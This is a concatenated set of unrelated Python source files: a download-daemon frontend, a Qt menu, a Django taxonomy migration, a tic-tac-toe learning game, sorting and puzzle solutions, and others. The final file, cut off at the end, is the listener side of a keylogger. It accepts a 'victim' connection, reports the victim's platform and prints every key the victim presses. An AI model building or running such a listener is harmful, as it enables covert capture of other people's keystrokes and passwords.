startEtmWhen(self, value):\n callXwaredInterface(\"setStartEtmWhen\", value)\n\n def _watcherThread(self):\n while True:\n try:\n backendInfo = callXwaredInterface(\"infoPoll\")\n self._statusUpdate(etmStatus = True if backendInfo.etmPid else False,\n xwaredStatus = True,\n userId = backendInfo.userId,\n peerId = backendInfo.peerId,\n lcPort = backendInfo.lcPort)\n except InvalidSocket:\n 
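# The control socket is down, so xwared itself is unreachable: report every\n # status field as offline/empty so the UI resets. Note this fallback passes\n # userId as the int 0 even though the pyqtProperty above declares it as str.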
self._statusUpdate(etmStatus = False,\n xwaredStatus = False,\n userId = 0,\n peerId = \"\",\n lcPort = 0)\n\n time.sleep(1)\n\n @pyqtSlot()\n def slotStartETM(self):\n callXwaredInterface(\"startETM\")\n\n @pyqtSlot()\n def slotStopETM(self):\n callXwaredInterface(\"stopETM\")\n\n @pyqtSlot()\n def slotRestartETM(self):\n callXwaredInterface(\"restartETM\")\n\n @property\n def managedBySystemd(self):\n return os.path.lexists(constants.SYSTEMD_SERVICE_ENABLED_USERFILE) and \\\n os.path.lexists(constants.SYSTEMD_SERVICE_USERFILE)\n\n @managedBySystemd.setter\n def managedBySystemd(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.SYSTEMD_SERVICE_ENABLED_USERFILE))\n\n trySymlink(constants.SYSTEMD_SERVICE_FILE,\n constants.SYSTEMD_SERVICE_USERFILE)\n\n trySymlink(constants.SYSTEMD_SERVICE_USERFILE,\n constants.SYSTEMD_SERVICE_ENABLED_USERFILE)\n else:\n tryRemove(constants.SYSTEMD_SERVICE_ENABLED_USERFILE)\n tryRemove(constants.SYSTEMD_SERVICE_USERFILE)\n if getInitType() == InitType.SYSTEMD:\n os.system(\"systemctl --user daemon-reload\")\n\n @property\n def managedByUpstart(self):\n return os.path.lexists(constants.UPSTART_SERVICE_USERFILE)\n\n @managedByUpstart.setter\n def managedByUpstart(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.UPSTART_SERVICE_USERFILE))\n\n trySymlink(constants.UPSTART_SERVICE_FILE,\n constants.UPSTART_SERVICE_USERFILE)\n else:\n tryRemove(constants.UPSTART_SERVICE_USERFILE)\n if getInitType() == InitType.UPSTART:\n os.system(\"initctl --user reload-configuration\")\n\n @property\n def managedByAutostart(self):\n return os.path.lexists(constants.AUTOSTART_DESKTOP_USERFILE)\n\n @managedByAutostart.setter\n def managedByAutostart(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.AUTOSTART_DESKTOP_USERFILE))\n\n trySymlink(constants.AUTOSTART_DESKTOP_FILE,\n constants.AUTOSTART_DESKTOP_USERFILE)\n else:\n tryRemove(constants.AUTOSTART_DESKTOP_USERFILE)\n","sub_path":"src/frontend/xwaredpy.py","file_name":"xwaredpy.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360650629","text":"# coding: utf-8\nimport logging\n\nfrom bgrsrc import phase\nfrom bgrsrc import justwait\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef waiting(window):\n logger.debug('待ち状態')\n while True:\n phase_name = phase.getPhaseName(window)\n if phase_name is None:\n justwait.justWait(window, 5)\n continue\n else:\n logger.info('待ち状態を抜けます')\n break\n","sub_path":"bgrsrc/waitphase.py","file_name":"waitphase.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499222375","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom PyQt5.QtWidgets import QMenuBar, QAction, QMenu\n\nfrom gwid.util import GIcon\n\n\nclass GMenuBar(QMenuBar):\n\n def __init__(self, parent=None):\n QMenuBar.__init__(self, parent)\n\n self.menu_file = self.addMenu(\"File\")\n #self.menu_file.aboutToShow.connect(self.on_menu_file_about_to_show)\n self.menu_edit = self.addMenu(\"Edit\")\n self.menu_view = self.addMenu(\"View\")\n self.menu_navigate = self.addMenu(\"Navigate\")\n self.menu_window = self.addMenu(\"Window\") # type: QMenu\n\n self.menu_close_viewer = self.menu_file.addMenu(\"Close viewer\")\n self.menu_close_viewer.setIcon(GIcon.close_view())\n self.action_close_viewers = QAction(\"Close all viewers\", self)\n self.action_close_viewers.setIcon(GIcon.close_views())\n self.action_close_viewers.triggered.connect(self.on_close_all_viewers)\n self.menu_file.addAction(self.action_close_viewers)\n\n self.menu_file.addSection(\"main\")\n\n # https://bugreports.qt.io/browse/QTBUG-56276\n def on_menu_file_about_to_show(self):\n print(\"=======================\")\n for action in self.menu_file.actions():\n print(action.text())\n\n def on_close_all_viewers(self):\n for action in self.menu_close_viewer.actions():\n action.activate(QAction.Trigger)\n\n\n\n\n\n","sub_path":"gator/app/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"153302360","text":"import logging\n\nfrom django.db import migrations\nfrom django.db import transaction\nfrom tqdm import tqdm\n\nimport solr_conabio.solr_api as solr\n\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('Catálogos Taxonómicos')\n\n\nHOST = 'http://snmb.conabio.gob.mx'\nCOLLECTION = 'taxonomia'\nROWS_PER_PETITION = 1000\n\nTERM_FMT = (\n 'Term type: {type}\\n'\n ' term: {term}\\n'\n ' parents: {parents}\\n'\n ' common names: {common}\\n'\n ' synonyms: {synonyms}'\n)\nTERM_METADATA_SCHEMA = {\n \"definitions\": {},\n \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n \"$id\": \"http://example.com/term_metadata_schema.json\",\n \"type\": \"object\",\n \"title\": \"Esquema de metadatos para términos taxonómicos\",\n \"required\": [\n \"id\",\n \"version\",\n \"origin\"\n ],\n \"properties\": {\n \"id\": {\n \"$id\": \"#/properties/id\",\n \"type\": \"string\",\n \"title\": \"id\",\n \"default\": \"\",\n \"examples\": [\n \"term.id\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"version\": {\n \"$id\": \"#/properties/version\",\n \"type\": \"string\",\n \"title\": \"version\",\n \"default\": \"\",\n \"examples\": [\n \"term.version\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"origin\": {\n \"$id\": \"#/properties/origin\",\n \"type\": \"string\",\n \"title\": \"origen\",\n \"default\": \"\",\n \"examples\": [\n \"juancarlos-catálogos\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n }\n}\n\n@transaction.atomic\ndef update_database(apps, schema_editor):\n db_models = get_database_models(apps)\n data = get_all_data()\n terms = parse_data(data)\n term_pk_map = create_all_terms(terms, db_models)\n create_all_entailments(terms, term_pk_map, db_models)\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('irekua_database', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(update_database),\n ]\n\n\ndef parse_data(data):\n logger.info('Parsing data...')\n terms = {\n str(datum['id']): Term(datum)\n for datum in data\n if datum['nombre']\n }\n logger.info('done.')\n return terms\n\n\ndef 
get_all_data(num_rows=ROWS_PER_PETITION):\n total_rows = get_num_rows()\n\n fl = [\n 'id',\n 'categoria_taxonomica',\n 'nombre',\n 'ascendentes',\n 'nombres_comunes',\n 'subcategoria_taxonomica',\n 'sinonimos',\n 'id_asc',\n '_version_'\n ]\n\n logger.info('Getting data...')\n data = []\n for start in tqdm(range(0, total_rows, num_rows)):\n response = solr.query(HOST, COLLECTION, rows=num_rows, start=start, fl=fl)\n data += response['response']['docs']\n\n logger.info('done.')\n return data\n\n\ndef get_num_rows():\n response = solr.query(HOST, COLLECTION, rows=0)\n return response['response']['numFound']\n\n\ndef create_all_terms(all_terms, db_models):\n pk_map = {}\n\n logger.info('Creating terms...')\n for term in tqdm(all_terms.values()):\n db_term = process_term(all_terms, term, db_models)\n pk_map[term.id] = db_term\n logger.info('done')\n\n return pk_map\n\n\ndef process_term(all_terms, term, db_models):\n term_type = get_term_type(term.term_type, db_models)\n\n try:\n scope = all_terms[term.scope].term\n except KeyError:\n logger.error('No scope for {}'.format(term.scope))\n scope = None\n\n db_term = create_term(\n term_type,\n term.term,\n scope,\n term.metadata,\n db_models)\n\n if term.synonyms:\n create_synonyms(all_terms, term, db_term, db_models)\n\n if term.common_names:\n create_common_names(all_terms, term, db_term, db_models)\n\n return db_term\n\n\nTERMS = {}\ndef create_term(term_type, value, scope, metadata, db_models):\n if (term_type.name, value, scope) in TERMS:\n return TERMS[(term_type.name, value, scope)]\n\n if scope is None:\n db_term, _ = db_models.Term.objects.get_or_create(\n term_type=term_type,\n value=value,\n defaults={\n 'metadata': metadata\n }\n )\n TERMS[(term_type.name, value, scope)] = db_term\n return db_term\n\n db_term, _ = db_models.Term.objects.get_or_create(\n term_type=term_type,\n value=value,\n scope=scope,\n defaults={\n 'metadata': metadata\n })\n TERMS[(term_type.name, value, scope)] = db_term\n return db_term\n\n\ndef create_common_names(all_terms, term, db_term, db_models):\n common_name_type = get_term_type('nombre común', db_models)\n\n try:\n scope = all_terms[term.scope].term\n except KeyError:\n logger.error('No scope for term {}'.format(term.scope))\n scope = None\n\n for common_name in term.common_names:\n common_name_term = create_term(\n common_name_type,\n common_name,\n scope,\n term.metadata,\n db_models)\n term.common_names_terms[common_name_term.pk] = common_name_term\n create_entailment(common_name_term, db_term, db_models)\n\n\nTERM_TYPES = {}\ndef get_term_type(term_type, db_models):\n if term_type not in TERM_TYPES:\n db_term_type, _ = db_models.TermType.objects.get_or_create(\n name=term_type,\n defaults={\n 'description': 'Nivel taxonómico: {}'.format(term_type),\n 'is_categorical': True,\n 'metadata_schema': TERM_METADATA_SCHEMA,\n 'synonym_metadata_schema': TERM_METADATA_SCHEMA\n }\n )\n TERM_TYPES[term_type] = db_term_type\n return db_term_type\n\n return TERM_TYPES[term_type]\n\n\ndef create_synonyms(all_terms, term, db_term, db_models):\n term_type = db_term.term_type\n\n try:\n scope = all_terms[term.scope].term\n except KeyError:\n logger.error('No scope for term {}'.format(term.scope))\n scope = None\n\n for synonym in term.synonyms:\n synonym_term = create_term(\n term_type,\n synonym,\n scope,\n term.metadata,\n db_models)\n term.synonyms_terms[synonym_term.pk] = synonym_term\n synonym, _ = create_synonym(synonym_term, db_term, term.metadata, db_models)\n\n\ndef create_synonym(source, target, metadata, 
db_models):\n return db_models.Synonym.objects.get_or_create(\n source=source,\n target=target,\n defaults={\n 'metadata': metadata\n }\n )\n\n\ndef create_all_entailments(terms, mapping, db_models):\n logger.info('Creating entailments...')\n for term in tqdm(terms.values()):\n create_term_entailments(term, mapping, db_models)\n logger.info('done.')\n\n\ndef create_term_entailments(term, mapping, db_models):\n db_term = mapping[term.id]\n\n for parent_id in term.parents:\n try:\n parent_term = mapping[parent_id]\n create_entailment(db_term, parent_term, db_models)\n\n for synonym in term.synonyms_terms.values():\n create_entailment(synonym, parent_term, db_models)\n\n for common_name in term.common_names_terms.values():\n create_entailment(common_name, parent_term, db_models)\n except KeyError:\n pass\n\n\n\ndef create_entailment(source, target, db_models):\n check_entailment_type(source, target, db_models)\n return db_models.Entailment.objects.get_or_create(\n source=source,\n target=target)\n\n\nENTAILMENT_TYPES = {}\ndef check_entailment_type(source, target, db_models):\n label = (source.term_type.pk, target.term_type.pk)\n\n if label not in ENTAILMENT_TYPES:\n entailment_type, _ = db_models.EntailmentType.objects.get_or_create(\n source_type=source.term_type,\n target_type=target.term_type)\n ENTAILMENT_TYPES[label] = entailment_type\n\n return ENTAILMENT_TYPES[label]\n\n\ndef get_database_models(apps):\n class DBModels(object):\n def __init__(self, apps):\n self.EntailmentType = apps.get_model('irekua_database', 'EntailmentType')\n self.Entailment = apps.get_model('irekua_database', 'Entailment')\n self.Term = apps.get_model('irekua_database', 'Term')\n self.TermType = apps.get_model('irekua_database', 'TermType')\n self.Synonym = apps.get_model('irekua_database', 'Synonym')\n\n return DBModels(apps)\n\n\nclass Term(object):\n def __init__(self, data):\n self.id = str(data['id'])\n\n try:\n self.term_type = data['subcategoria_taxonomica']\n except KeyError:\n try:\n self.term_type = data['categoria_taxonomica']\n except KeyError:\n self.term_type = None\n logger.error('No term type for {}'.format(data))\n\n self.term = data['nombre']\n self.version = data['_version_']\n\n self.common_names = data.get('nombres_comunes', [])\n self.synonyms = data.get('sinonimos', [])\n self.scope = str(data.get('id_asc', ''))\n\n self.parents = [\n str(sid) for sid in data['ascendentes'].split(',')\n if str(sid) != str(self.id)\n ]\n\n self.parents_terms = {}\n self.synonyms_terms = {}\n self.common_names_terms = {}\n\n @property\n def metadata(self):\n return {\n 'id': str(self.id),\n 'version': str(self.version),\n 'origin': 'juancarlos-catálogos'\n }\n\n def __str__(self):\n return TERM_FMT.format(\n type=self.term_type,\n term=self.term,\n parents=str(self.parents),\n common=str(self.common_names),\n synonyms=str(self.synonyms))\n\n def __repr__(self):\n return str(self)\n","sub_path":"conabio_irekua_migrations/migrations/catalogos_taxonomicos_conabio.py","file_name":"catalogos_taxonomicos_conabio.py","file_ext":"py","file_size_in_byte":9859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425320886","text":"# change the name\nclass qbeOutput:\n def __init__(self, start_time):\n self.start_time = start_time.strftime('%Y-%m-%d %H:%M:%S')\n self.end_time = '2021-05-14 10:31:00'\n self.file = []\n self.output_file= []\n self.msg = []\n # change the following field to fulfilled the requirement\n self.currmb=0\n self.precon=0\n self.acbmb=0\n 
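# Per-key breakdown lists: each entry is a dict such as {'ACTN': ..., 'COUNT': ...}\n # that qbeOutputToTemplate below flattens into name(count) report lines.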
self.actmb_actn= []\n self.actmb_currto= []\n self.pec= []\n def addfile(self,file_name,count):\n file_dict = {'file_name': file_name,'count':count}\n self.file.append(file_dict)\n def add_msg(self,msg):\n self.msg.append(msg)\nclass qbeOutputToTemplate:\n def __init__(self, qbe_output):\n self.start_time = qbe_output.start_time\n self.end_time= qbe_output.end_time\n self.file = self.get_file(qbe_output.file)\n self.output_file= self.get_output_file(qbe_output.output_file)\n self.msg= self.get_msg(qbe_output.msg)\n # change the following field to fulfilled the requirement\n self.currmb = qbe_output.currmb\n self.precon = qbe_output.precon\n self.acbmb = qbe_output.acbmb\n self.actmb_actn = self.get_actmb_actn(qbe_output.actmb_actn)\n self.actmb_currto = self.get_actmb_currto(qbe_output.actmb_currto)\n self.pec = self.get_pec(qbe_output.pec)\n\n def get_file(self,file):\n result = ''\n for val in file:\n result += val['file_name']+'(' + str(val['count']) + ')\\n'\n return result\n\n def get_output_file(self, output_file):\n result = ''\n for val in output_file:\n result += val +'\\n'\n return result\n\n def get_msg(self, msg):\n result = ''\n for val in msg:\n result += val +'\\n'\n return result\n# delete the following field to fulfilled the requirement\n def get_pec(self, pec):\n result = ''\n for val in pec:\n result += val +'\\n'\n return result\n\n def get_actmb_actn(self,actmb_actn):\n result = ''\n for val in actmb_actn:\n result += val['ACTN']+'(' + str(val['COUNT']) + ')\\n'\n return result\n \n def get_actmb_currto(self,actmb_currto):\n result = ''\n for val in actmb_currto:\n result += val['CURRTO'].strftime('%Y%m%d')+'(' + str(val['COUNT']) + ')\\n'\n return result","sub_path":"qbe_output.py","file_name":"qbe_output.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23092164","text":"import pickle\nimport random\nimport tkinter as tk\nfrom tkinter import font\nfrom collections import Counter\nfirstrun = 1\n\n#Tkinter GUI\nclass GUI2:\n def __init__(self):\n self.move_no = 0\n\n self.obj_names = []\n self.Temp_obj_list = []\n try:\n with open('dictO.pkl', 'rb') as file:\n self.Menace_obj_list = pickle.load(file)\n except:\n self.Menace_obj_list = {}\n\n self.mv = 3\n self.board = tk.Tk()\n self.proBoard = tk.Tk()\n self.proBoard.title(\"Probability of earlier move\")\n self.board.title(\"Tic-Tac-Toe\")\n self.buttons = []\n self.proButtons = []\n self.font1 = font.Font(size=36)\n #Create buttons\n for x in range(0, 3):\n for y in range(0, 3):\n b = tk.Button(self.board, height=2, width=6, text='', font=self.font1)\n b.config(command=lambda widget=b: self.callProg(widget))\n b.grid(row=x, column=y)\n b.position = (x, y)\n self.buttons.append(b)\n\n p = tk.Button(self.proBoard, height=4, width=12, text='', font=self.font1)\n p.grid(row=x, column=y)\n p.position = (x, y)\n self.proButtons.append(p)\n\n self.b1 = tk.Button(self.board, height=1, width=6, text='Exit', font=self.font1)\n self.b1.config(command=lambda: self.Destroy())\n self.b1.grid(row=3, column=0)\n\n self.TextBox = tk.Label(self.board, text=\"\",font = self.font1)\n self.TextBox.grid(row = 3, column = 2)\n self.Runprog()\n self.board.mainloop()\n\n def callProg(self,widget):\n k = self.on_click(widget)\n if k==0:\n self.Runprog()\n\n def Invalid_Moves(self):\n invalid_m = []\n for x in range(0, 9):\n if self.buttons[x][\"text\"] == \"X\" or self.buttons[x][\"text\"] == \"O\":\n invalid_m.append(x)\n return invalid_m\n\n 
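# Show MENACE's current preference for each cell: Counter tallies how many beads\n # back each move in ll, and each button then displays that share of the total as\n # a percentage (cells with no beads show 0 %).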
def Disp_Probab(self,ll):\n ct = Counter(ll)\n for x in range(9):\n try:\n perc = str((ct[x]/len(ll))*100)+\"0000\"\n perc = perc[:4]\n self.proButtons[x][\"text\"] = perc + \" %\"\n except:\n self.proButtons[x][\"text\"] = \"0 %\"\n \n def on_click(self, widget):\n r, c = widget.position\n convert = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]\n num = convert[r][c]\n iv = self.Invalid_Moves()\n if num not in iv:\n self.move_no += 1\n else:\n return -1\n if num not in iv and self.mv % 2 != 0:\n self.buttons[num][\"text\"] = \"X\"\n self.mv = 2\n self.obj_names.append(str(num))\n check = self.Invalid_Moves()\n check2 = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n Check_if_Won = self.Has_Won()\n if check != check2 and Check_if_Won == \"Continue\":\n return 0\n if Check_if_Won == \"O\":\n self.GUI2_win()\n elif Check_if_Won == \"X\":\n self.GUI2_loss()\n elif Check_if_Won == \"Draw\":\n self.GUI2_draw()\n\n def Menace_click(self, Menace_obj):\n click = Menace_obj.r_select()\n self.Disp_Probab(Menace_obj.probab)\n #Print probability\n if click == -1:\n self.GUI2_loss()\n else:\n invalid_m = self.Invalid_Moves()\n if click not in invalid_m and self.mv % 2 != 1:\n self.buttons[click][\"text\"] = \"O\"\n self.mv = 3\n self.obj_names.append(str(click))\n Check_if_Won = self.Has_Won()\n if Check_if_Won == \"O\":\n self.GUI2_win()\n elif Check_if_Won == \"X\":\n self.GUI2_loss()\n elif Check_if_Won == \"Draw\":\n self.GUI2_draw()\n\n def Runprog(self):\n global firstrun\n if firstrun == 1:\n firstrun=0\n else:\n self.move_no+=1\n listX = []\n listO = []\n listAll = []\n for x in range(0, 9):\n if self.buttons[x][\"text\"] == \"X\":\n listX.append(x)\n elif self.buttons[x][\"text\"] == \"O\":\n listO.append(x)\n listAll = listO + listX\n\n name = \"\"\n name = ''.join(self.obj_names)\n name = \"_\" + name\n if self.mv % 2 == 0:\n if name not in self.Menace_obj_list:\n # print(self.move_no)\n M_obj = MENACE2(listAll, self.move_no)\n self.Menace_obj_list[name] = M_obj\n self.Temp_obj_list.append(self.Menace_obj_list[name])\n self.Menace_click(self.Menace_obj_list[name])\n\n else:\n self.Temp_obj_list.append(self.Menace_obj_list[name])\n self.Menace_click(self.Menace_obj_list[name])\n\n def reset(self):\n global firstrun\n firstrun = 1\n self.TextBox[\"text\"] = \"\"\n for x in range(0, 9):\n self.buttons[x][\"text\"] = ''\n self.obj_names = []\n self.move_no = 0\n self.mv = 1\n self.Runprog()\n\n def GUI2_win(self):\n self.TextBox[\"text\"] = \"You Lose\"\n for x in self.Temp_obj_list:\n x.win()\n self.Temp_obj_list = []\n print(\"Win call\")\n self.mv = 3\n self.board.after(1500, lambda: self.reset())\n\n def GUI2_draw(self):\n self.TextBox[\"text\"] = \"Draw\"\n for x in self.Temp_obj_list:\n x.draw()\n self.Temp_obj_list = []\n print(\"Draw call\")\n self.mv = 3\n self.board.after(1500, lambda: self.reset())\n\n def GUI2_loss(self):\n self.TextBox[\"text\"] = \"You Win\"\n for x in self.Temp_obj_list:\n x.loss()\n self.Temp_obj_list = []\n print(\"Loss call\")\n self.mv = 3\n self.board.after(1500, lambda: self.reset())\n\n def Has_Won(self):\n # Horizontal\n for x in range(0, 7, 3):\n if self.buttons[x][\"text\"] == self.buttons[x + 1][\"text\"] == self.buttons[x + 2][\"text\"] == \"X\":\n return \"X\"\n elif self.buttons[x][\"text\"] == self.buttons[x + 1][\"text\"] == self.buttons[x + 2][\"text\"] == \"O\":\n return \"O\"\n # Vertical\n for x in range(0, 3):\n if self.buttons[x][\"text\"] == self.buttons[x + 3][\"text\"] == self.buttons[x + 6][\"text\"] == \"X\":\n return \"X\"\n elif self.buttons[x][\"text\"] == 
self.buttons[x + 3][\"text\"] == self.buttons[x + 6][\"text\"] == \"O\":\n return \"O\"\n # Diagonal\n if self.buttons[0][\"text\"] == self.buttons[4][\"text\"] == self.buttons[8][\"text\"] == \"X\":\n return \"X\"\n elif self.buttons[0][\"text\"] == self.buttons[4][\"text\"] == self.buttons[8][\"text\"] == \"O\":\n return \"O\"\n elif self.buttons[2][\"text\"] == self.buttons[4][\"text\"] == self.buttons[6][\"text\"] == \"X\":\n return \"X\"\n elif self.buttons[2][\"text\"] == self.buttons[4][\"text\"] == self.buttons[6][\"text\"] == \"O\":\n return \"O\"\n # Draw\n inv = self.Invalid_Moves()\n invcheck = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n if invcheck == inv:\n return \"Draw\"\n return \"Continue\"\n\n def Destroy(self):\n with open('dictO.pkl', 'wb') as file:\n pickle.dump(self.Menace_obj_list, file)\n self.board.destroy()\n\n#Store all the gamestates and its probabilities\nclass MENACE2:\n def __init__(self, prob, mv_no):\n self.buffer = 100\n self.mv = mv_no\n if mv_no == 2:\n self.l1 = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3,\n 4, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7,\n 8, 8, 8, 8, 8, 8, 8, 8]\n elif mv_no == 4:\n self.l1 = [0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7,\n 8, 8, 8, 8]\n elif mv_no == 6:\n self.l1 = [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8]\n elif mv_no == 8:\n self.l1 = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n else:\n self.l1 = [0,1,2,3,4,5,6,7,8]\n print(mv_no,\"Fail\")\n try:\n self.probab = [x for x in self.l1 if x not in prob]\n except:\n print(mv_no, \"_________________________________________________\")\n\n def __repr__(self):\n k = '['\n for x in self.l1:\n k = k + str(x) + \", \"\n k = k[:len(k) - 2]\n k = k + ']'\n return k\n\n def r_select(self):\n try:\n new_cell = random.choice(self.probab)\n self.buffer = new_cell\n #print(self.probab)\n return new_cell\n except:\n model = [0,1,2,3,4,5,6,7,8]\n if self.mv < 8:\n k = [x for x in model if x not in self.prob]\n print(\"Random Invoked\")\n self.buffer = random.choice(k)\n return self.buffer\n return -1\n\n def loss(self):\n try:\n self.probab.remove(self.buffer)\n except:\n pass\n\n def win(self):\n for x in range(0, 3):\n self.probab.append(self.buffer)\n\n def draw(self):\n self.probab.append(self.buffer)\n\n# pprint.pprint(Menace_obj_list, stream=None, indent=3, width=80, depth=None)\n#W=GUI2()\n","sub_path":"_O.py","file_name":"_O.py","file_ext":"py","file_size_in_byte":9471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70254835","text":"# ====================================\n# Radix Sort Python implementation\n# Author: lv10\n# ====================================\n\nimport collections\n\n# A list of integers is defined\nseq = [123, 312, 214, 470, 652, 511, 911, 999, 199, 180, 456,\n 100, 970, 690, 520, 111, 520, 509, 511, 432, 227, 119]\n\n\ndef bucket_sort(seq, idx):\n\n while idx >= 0:\n bucket = dict()\n\n for nbr in seq:\n key = int(str(nbr)[idx])\n if not bucket.get(key):\n bucket[key] = [nbr]\n else:\n bucket[key].append(nbr)\n\n # sort the dictionary by keys to get the dict values in the right order\n ordered_bucket = collections.OrderedDict(sorted(bucket.items()))\n\n seq = []\n\n for item in ordered_bucket.values():\n seq += item\n\n idx -= 1\n\n return seq\n\n\ndef bucket_sort_recursive(seq, idx):\n\n \"\"\"\n Tail Recursive solution\n \"\"\"\n\n if idx < 0:\n return seq\n\n bucket 
= dict()\n\n for nbr in seq:\n key = int(str(nbr)[idx])\n if not bucket.get(key):\n bucket[key] = [nbr]\n else:\n bucket[key].append(nbr)\n\n # order the dictionary by key\n ordered_bucket = collections.OrderedDict(sorted(bucket.items()))\n\n seq = list()\n for item in ordered_bucket.values():\n seq += item\n\n return bucket_sort_recursive(seq, idx-1)\n\n\nassert bucket_sort(seq, 2) == sorted(seq)\nassert bucket_sort_recursive(seq, 2) == sorted(seq)\nassert bucket_sort(seq, 2) == bucket_sort_recursive(seq, 2)\n","sub_path":"algos/bucket_sort/bucket_sort.py","file_name":"bucket_sort.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"111177618","text":"# coding=utf-8\n# Time: 2019-11-21-17:37 \n# Author: dongshichao\n\n'''\n139. Word Break\n\nGiven a non-empty string s and a dictionary wordDict containing a list of non-empty words, determine whether s can be split by spaces into one or more words that appear in the dictionary.\n\nNotes:\n\nWords in the dictionary may be reused when splitting.\nYou may assume there are no duplicate words in the dictionary.\nExample 1:\n\nInput: s = \"leetcode\", wordDict = [\"leet\", \"code\"]\nOutput: true\nExplanation: returns true because \"leetcode\" can be split into \"leet code\".\n\n'''\n\nclass Solution(object):\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: List[str]\n :rtype: bool\n \"\"\"\n n = len(s)\n\n dp = [False for _ in range(n)]\n # dp[i] marks whether the substring ending at s[i] can be split into one or more dictionary words\n\n dp[0] = s[0] in wordDict\n\n for r in range(1,n):\n if s[:r+1] in wordDict:\n dp[r] = True\n continue\n\n for l in range(r):\n if dp[l] and s[l+1:r+1] in wordDict:\n dp[r] = True\n break\n\n return dp[-1]\n\n","sub_path":"list/wordBreak.py","file_name":"wordBreak.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"130825000","text":"from datetime import time\r\nfrom django.db import models\r\nfrom django.utils import timezone\r\n\r\nclass Table1(models.Model):\r\n reference_id = models.IntegerField(primary_key=True, default=0)\r\n api = models.CharField(max_length=16)\r\n\r\n\r\nclass Data(models.Model):\r\n api_key = models.ForeignKey(Table1, on_delete=models.CASCADE)\r\n temparature = models.FloatField(default=0)\r\n humidity = models.FloatField(default=0)\r\n dat = models.DateField(default=timezone.now)\r\n tim = models.TimeField(default= timezone.now)\r\n","sub_path":"Sensing/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"221382252","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val, prev, next, child):\n self.val = val\n self.prev = prev\n self.next = next\n self.child = child\n\"\"\"\nfrom collections import deque\nclass Solution:\n def flatten(self, head: 'Node') -> 'Node':\n queue = []\n dummy = Node(None, None, None, None)\n dummy.next = head\n pointer = dummy\n \n while pointer:\n if pointer.child:\n if pointer.next:\n queue.append(pointer.next)\n pointer.next = pointer.child\n pointer.next.prev = pointer\n pointer.child = None\n # print(pointer.val,len(queue))\n if not pointer.next and len(queue) > 0:\n pointer.next = queue.pop()\n pointer.next.prev = pointer\n pointer = pointer.next\n return dummy.next","sub_path":"python/2019/MS/flattenNodesChild.py","file_name":"flattenNodesChild.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"105395272","text":"import socket\nimport os\nfrom os import path\n\nif os.name == 'nt':\n from 
colorama import init\n init(convert=True)\n\nfrom ui_core.coloring import notify\n\nclass Controller:\n def __init__(self, conn_type, port):\n # Keep the port on the instance; make_the_connection() reads it below.\n self.port = port\n\n notify(\"notify\",\"Making Connection\", \"\")\n \n try:\n self.get_socket(conn_type)\n self.make_the_connection()\n victim_os = self.conn.recv(1024).decode('UTF-8')\n print(f\"Victim is using {victim_os}\")\n notify(\"report\", \"Got Platform from victim\", flush=True)\n connected = True\n while connected:\n key = self.conn.recv(1024)\n print(\"{} Pressed : {} \".format(self.address, key))\n\n except:\n connected = False\n notify(\"problem\",\n \"Connection Failed. Victim Might Be Offline, Try Again Later\")\n\n def make_the_connection(self):\n self.connection.bind(('', int(self.port)))\n self.connection.listen()\n self.conn, self.address = self.connection.accept()\n\n def get_socket(self, conn_type):\n if conn_type == \"TCP\":\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n elif conn_type == \"UDP\":\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ndef connect(connection_type: str, port: int):\n Controller(connection_type, 